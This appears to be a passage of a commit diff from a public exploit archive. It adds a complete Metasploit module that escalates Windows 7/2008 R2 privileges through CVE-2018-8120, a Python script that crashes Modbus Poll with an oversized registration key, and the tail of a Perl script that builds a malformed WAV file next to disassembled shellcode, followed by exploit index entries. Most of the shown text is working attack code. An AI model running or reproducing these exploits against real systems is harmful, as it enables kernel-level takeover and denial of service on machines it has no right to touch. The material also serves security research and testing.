# 0x000000000000406e <+46>: rex.W lods %ds:(%rsi),%al
# 0x0000000000004070 <+48>: add %al,(%rax)
# 0x0000000000004072 <+50>: fs (bad)
# 0x0000000000004074 <+52>: je 0x40d7 <shellcode+151>
# 0x0000000000004076 <+54>: nop
# 0x0000000000004077 <+55>: pop %rax
# 0x0000000000004078 <+56>: add %eax,(%rax)
# 0x000000000000407a <+58>: add %al,(%rax)
# 0x000000000000407c <+60>: add %al,(%rax)
# 0x000000000000407e <+62>: add %al,(%rax)
# 0x0000000000004080 <+64>: add %al,(%rax)
# 0x0000000000004082 <+66>: add %al,(%rax)
# 0x0000000000004084 <+68>: add %al,(%rax)
# 0x0000000000004086 <+70>: (bad)
# 0x0000000000004087 <+71>: incl (%rax)
# 0x0000000000004089 <+73>: add %al,(%rax)
# 0x000000000000408b <+75>: add %bh,%bh
# 0x000000000000408d <+77>: incl (%rax)
# 0x000000000000408f <+79>: add %bh,%bh
# 0x0000000000004091 <+81>: incl (%rax)
# 0x0000000000004093 <+83>: add %bh,%bh
# 0x0000000000004095 <+85>: incl (%rax)
# 0x0000000000004097 <+87>: add %bh,%bh
# 0x0000000000004099 <+89>: incl (%rax)
# 0x000000000000409b <+91>: add %bh,%bh
open(code, ">lock.wav");
binmode(code);
$data =
"\x52\x49\x46\x46\xc2\x58\x01\x00\x57\x41\x56\x45\x44\x44\x44\x44" .
"\xf8\xff\xff\xff\x01\x00\x01\x00\x22\x56\x00\x00\x44\xac\x00\x00" .
"\x02\x00\x10\x00\x00\x00\x66\x61\x63\x74\x04\x00\x00\x00\x48\xac" .
"\x00\x00\x64\x61\x74\x61\x90\x58\x01\x00\x00\x00\x00\x00\x00\x00" .
"\x00\x00\x00\x00\x00\x00\xff\xff\x00\x00\x00\x00\xff\xff\x00\x00" .
"\xff\xff\x00\x00\xff\xff\x00\x00\xff\xff\x00\x00\xff\xff\x00\x00" .
"\xff\xff\x00\x00\xff\xff\x00\x00\xff\xff\x00\x00\xff\xff\x00\x00" .
"\xff\xff\x00\x00\xff\xff\x01\x00\x08\x00\x0b\x00\x0c\x00\x0b\x00" .
"\x0c\x00\x09\x00\x07\x00\x0a\x00\x0a\x00\x07\x00\x0b\x00\x09\x00" .
"\x08\x00\x0a\x00\x08\x00\x09\x00\x0a\x00\x0a\x00\x0a\x00\x09\x00" .
"\x09\x00\x0a\x00\x0c\x00\x0c\x00\x0a\x00\x0b\x00\x0c\x00\x08\x00" .
"\x0b\x00\x0d\x00\x0a\x00\x0c\x00\x0d\x00\x0a\x00\x0a\x00\x0a\x00" .
"\x0c\x00\x0c\x00\x0d\x00\x10\x00\x0b\x00\x0d\x00\x0c\x00\x09\x00" .
"\x0a\x00\x0e\x00\x0b\x00\x0b\x00\x0a\x00\x0e\x00\x0a\x00\x07\x00" .
"\x08\x00\x05\x00\x08\x00\x0b\x00\x09\x00\x0b\x00\x08\x00\x08\x00" .
"\x0b\x00\x09\x00\x07\x00\x08\x00\x07\x00\x09\x00\x0d\x00\x0c\x00" .
"\x0b\x00\x0b\x00\x0a\x00\x0c\x00\x0f\x00\x0a\x00\x0a\x00\x0b\x00" .
"\x0f\x00\x07\x00\x09\x00\x07\x00\x09\x00\x08\x00\x05\x00\x0a\x00" .
"\x0a\x00\x07\x00\x08\x00\x0b\x00\x06\x00\x0d\x00\x0c\x00\x0c\x00" .
"\x0b\x00\x0c\x00\x0b\x00\x09\x00\x0b\x00\x0b\x00\x09\x00\x0f\x00" .
"\x08\x00\x0a\x00\x0f\x00\x0b\x00\x0d\x00\x0a\x00\x0a\x00\x09\x00" .
"\x09\x00\x0d\x00\x10\x00\x0d\x00\x0b\x00\x0c\x00\x0e\x00\x09\x00" .
"\x0c\x00\x0e\x00\x0a\x00\x0b\x00\x0b\x00\x0b\x00\x0a\x00\x0e\x00";
print code $data;
close(code);

126
exploits/windows/local/45653.rb Executable file
View file

@ -0,0 +1,126 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Local
Rank = GoodRanking
include Msf::Post::File
include Msf::Exploit::EXE
include Msf::Post::Windows::Priv
include Msf::Exploit::FileDropper
def initialize(info={})
super(update_info(info,
'Name' => 'Windows SetImeInfoEx Win32k NULL Pointer Dereference',
'Description' => %q{
This module exploits elevation of privilege vulnerability that exists in Windows 7 and 2008 R2
when the Win32k component fails to properly handle objects in memory. An attacker who
successfully exploited this vulnerability could run arbitrary code in kernel mode. An
attacker could then install programs; view, change, or delete data; or create new
accounts with full user rights.
This module is tested against windows 7 x86, windows 7 x64 and windows server 2008 R2 standard x64.
},
'License' => MSF_LICENSE,
'Author' => [
'unamer', # Exploit PoC
'bigric3', # Analysis and exploit
'Anton Cherepanov', # Vulnerability discovery
'Dhiraj Mishra <dhiraj@notsosecure.com>' # Metasploit
],
'Platform' => 'win',
'SessionTypes' => [ 'meterpreter' ],
'DefaultOptions' => {
'EXITFUNC' => 'thread'
},
'Targets' => [
[ 'Automatic', {} ],
[ 'Windows 7 x64', { 'Arch' => ARCH_X64 } ],
[ 'Windows 7 x86', { 'Arch' => ARCH_X86 } ]
],
'Payload' => {
'Space' => 4096,
'DisableNops' => true
},
'References' => [
['BID', '104034'],
['CVE', '2018-8120'],
['URL', 'https://github.com/unamer/CVE-2018-8120'],
['URL', 'https://github.com/bigric3/cve-2018-8120'],
['URL', 'http://bigric3.blogspot.com/2018/05/cve-2018-8120-analysis-and-exploit.html'],
['URL', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8120']
],
'DisclosureDate' => 'May 9 2018',
'DefaultTarget' => 0
))
end
def assign_target
if is_system?
fail_with(Failure::None, 'Session is already elevated')
end
if sysinfo['OS'] =~ /XP|NT/i
fail_with(Failure::Unknown, 'The exploit binary does not support Windows XP')
end
return target unless target.name == 'Automatic'
case sysinfo['Architecture']
when 'x64'
vprint_status('Targeting x64 system')
return targets[1]
when 'x86'
fail_with(Failure::BadConfig, "Invalid payload architecture") if payload_instance.arch.first == ARCH_X64
vprint_status('Targeting x86 system')
return targets[2]
end
end
def write_file_to_target(fname, data)
tempdir = session.sys.config.getenv('TEMP')
file_loc = "#{tempdir}\\#{fname}"
vprint_warning("Attempting to write #{fname} to #{tempdir}")
write_file(file_loc, data)
vprint_good("#{fname} written")
file_loc
rescue Rex::Post::Meterpreter::RequestError => e
elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
fail_with(Failure::Unknown, "Writing #{fname} to disk was unsuccessful")
end
def check_arch
sys_arch = assign_target
if sys_arch.name =~ /x86/
return 'CVE-2018-8120x86.exe'
else sys_arch.name =~ /x64/
return 'CVE-2018-8120x64.exe'
end
end
def exploit
cve_fname = check_arch
rexe = File.join(Msf::Config.data_directory, 'exploits', 'CVE-2018-8120', cve_fname)
vprint_status("Reading payload from file #{rexe}")
raw = File.read(rexe)
rexename = "#{Rex::Text.rand_text_alphanumeric(10)}.exe"
vprint_status("EXE's name is: #{rexename}")
exe = generate_payload_exe
tempexename = "#{Rex::Text.rand_text_alpha(6..14)}.exe"
exe_payload = write_file_to_target(tempexename, exe)
vprint_status("Payload uploaded to temp folder")
cve_exe = write_file_to_target(rexename, raw)
command = "\"#{cve_exe}\" \"#{exe_payload}\""
vprint_status("Location of CVE-2018-8120.exe is: #{cve_exe}")
register_file_for_cleanup(exe_payload)
vprint_status("Executing command : #{command}")
cmd_exec_get_pid(command)
print_good('Exploit finished, wait for privileged payload execution to complete.')
end
end

27
exploits/windows_x86/dos/45641.py Executable file
View file

@ -0,0 +1,27 @@
# Exploit Title: Modbus Poll 7.2.2 - Denial of Service (PoC)
# Discovery by: Cemal Cihad ÇİFTÇİ
# Discovery Date: 2018-10-19
# Tested Version: 7.2.2
# Vulnerability Type: DOS
# Tested on OS: Windows XP Professional Service Pack 3
# Vendor Homepage: https://www.modbustools.com
# Download Link: https://www.modbustools.com/download.html
# Steps to Reproduce: Run the python exploit script, it will create a new
# file with the name "exploit.txt". Copy the content of the new file "exploit.txt".
# Now start the program. Now when you are inside of the program click Connection button and
# click "connect". It will ask you for registration key. In the field: "Registration Key"
# paste the copied content from "exploit.txt".
# Now click "OK" and see a crash!
#!/usr/bin/python
buffer = "A" * 4000
try:
f=open("exploit.txt","w")
print "[+] Creating %s bytes evil payload.." %len(buffer)
f.write(buffer)
f.close()
print "[+] File created!"
except:
print "File cannot be created"

19
files_exploits.csv
View file

@ -6147,6 +6147,14 @@ id,file,description,date,author,type,platform,port
45571,exploits/windows/dos/45571.js,"Microsoft Edge Chakra JIT - 'BailOutOnInvalidatedArrayHeadSegment' Check Bypass",2018-10-09,"Google Security Research",dos,windows,
45572,exploits/windows/dos/45572.js,"Microsoft Edge Chakra JIT - Type Confusion",2018-10-09,"Google Security Research",dos,windows,
45579,exploits/android/dos/45579.txt,"WhatsApp - RTP Processing Heap Corruption",2018-10-10,"Google Security Research",dos,android,
45641,exploits/windows_x86/dos/45641.py,"Modbus Poll 7.2.2 - Denial of Service (PoC)",2018-10-22,"Cemal Cihad ÇİFTÇİ",dos,windows_x86,
45644,exploits/windows/dos/45644.pl,"AudaCity 2.3 - Denial of Service (PoC)",2018-10-22,"Kağan Çapar",dos,windows,
45647,exploits/macos/dos/45647.c,"Apple Intel GPU Driver - Use-After-Free/Double-Delete due to bad Locking",2018-10-22,"Google Security Research",dos,macos,
45648,exploits/multiple/dos/45648.txt,"Apple iOS/macOS - Sandbox Escape due to Trusted Length Field in Shared Memory used by HID Event Subsystem",2018-10-22,"Google Security Research",dos,multiple,
45649,exploits/ios/dos/45649.txt,"Apple iOS - Kernel Stack Memory Disclosure due to Failure to Check copyin Return Value",2018-10-22,"Google Security Research",dos,ios,
45650,exploits/multiple/dos/45650.txt,"Apple iOS/macOS - Sandbox Escape due to mach Message sent from Shared Memory",2018-10-22,"Google Security Research",dos,multiple,
45651,exploits/multiple/dos/45651.c,"Apple iOS/macOS - Kernel Memory Corruption due to Integer Overflow in IOHIDResourceQueue::enqueueReport",2018-10-22,"Google Security Research",dos,multiple,
45652,exploits/ios/dos/45652.c,"Apple iOS Kernel - Use-After-Free due to bad Error Handling in Personas",2018-10-22,"Google Security Research",dos,ios,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -10037,6 +10045,7 @@ id,file,description,date,author,type,platform,port
45626,exploits/windows/local/45626.rb,"VLC Media Player - MKV Use-After-Free (Metasploit)",2018-10-16,Metasploit,local,windows,
45627,exploits/windows_x86/local/45627.py,"Any Sound Recorder 2.93 - Buffer Overflow (SEH)",2018-10-17,"Abdullah Alıç",local,windows_x86,
45631,exploits/linux/local/45631.md,"Git Submodule - Arbitrary Code Execution",2018-10-16,joernchen,local,linux,
45653,exploits/windows/local/45653.rb,"Windows - SetImeInfoEx Win32k NULL Pointer Dereference (Metasploit)",2018-10-22,Metasploit,local,windows,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -39991,7 +40000,7 @@ id,file,description,date,author,type,platform,port
45221,exploits/php/webapps/45221.txt,"WordPress Plugin Chained Quiz 1.0.8 - 'answer' SQL Injection",2018-08-20,"Çlirim Emini",webapps,php,80
45224,exploits/php/webapps/45224.txt,"MyBB Moderator Log Notes Plugin 1.1 - Cross-Site Request Forgery",2018-08-20,0xB9,webapps,php,80
45225,exploits/php/webapps/45225.txt,"WordPress Plugin Tagregator 0.6 - Cross-Site Scripting",2018-08-20,ManhNho,webapps,php,80
45228,exploits/php/webapps/45228.txt,"Countly - Persistent Cross-Site Scripting",2018-08-20,Sleepy,webapps,php,
45228,exploits/php/webapps/45228.txt,"Countly - Cross-Site Scripting",2018-08-20,Sleepy,webapps,php,
45230,exploits/php/webapps/45230.txt,"Twitter-Clone 1 - 'userid' SQL Injection",2018-08-21,L0RD,webapps,php,80
45231,exploits/hardware/webapps/45231.rb,"Hikvision IP Camera 5.4.0 - User Enumeration (Metasploit)",2018-08-21,Alfie,webapps,hardware,
45232,exploits/php/webapps/45232.txt,"Twitter-Clone 1 - Cross-Site Request Forgery (Delete Post)",2018-08-21,L0RD,webapps,php,
@ -40154,3 +40163,11 @@ id,file,description,date,author,type,platform,port
45635,exploits/php/webapps/45635.txt,"Learning with Texts 1.6.2 - 'start' SQL Injection",2018-10-18,"Ihsan Sencan",webapps,php,
45636,exploits/php/webapps/45636.txt,"PHP-SHOP master 1.0 - Cross-Site Request Forgery (Add Admin)",2018-10-18,"Alireza Norkazemi",webapps,php,80
45637,exploits/php/webapps/45637.txt,"OwnTicket 1.0 - 'TicketID' SQL Injection",2018-10-18,"Ihsan Sencan",webapps,php,
45639,exploits/php/webapps/45639.txt,"MySQL Edit Table 1.0 - 'id' SQL Injection",2018-10-22,"Ihsan Sencan",webapps,php,
45642,exploits/php/webapps/45642.txt,"School ERP Ultimate 2018 - Arbitrary File Download",2018-10-22,"Ihsan Sencan",webapps,php,
45643,exploits/java/webapps/45643.txt,"Oracle Siebel CRM 8.1.1 - CSV Injection",2018-10-22,"Sarath Nair",webapps,java,
45645,exploits/php/webapps/45645.txt,"The Open ISES Project 3.30A - 'tick_lat' SQL Injection",2018-10-22,"Ihsan Sencan",webapps,php,
45646,exploits/php/webapps/45646.txt,"School ERP Ultimate 2018 - 'fid' SQL Injection",2018-10-22,"Ihsan Sencan",webapps,php,
45654,exploits/php/webapps/45654.txt,"eNdonesia Portal 8.7 - 'artid' SQL Injection",2018-10-22,"Ihsan Sencan",webapps,php,
45655,exploits/php/webapps/45655.txt,"The Open ISES Project 3.30A - Arbitrary File Download",2018-10-22,"Ihsan Sencan",webapps,php,
45656,exploits/php/webapps/45656.txt,"Viva Visitor & Volunteer ID Tracking 0.95.1 - 'fname' SQL Injection",2018-10-22,"Ihsan Sencan",webapps,php,

Can't render this file because it is too large.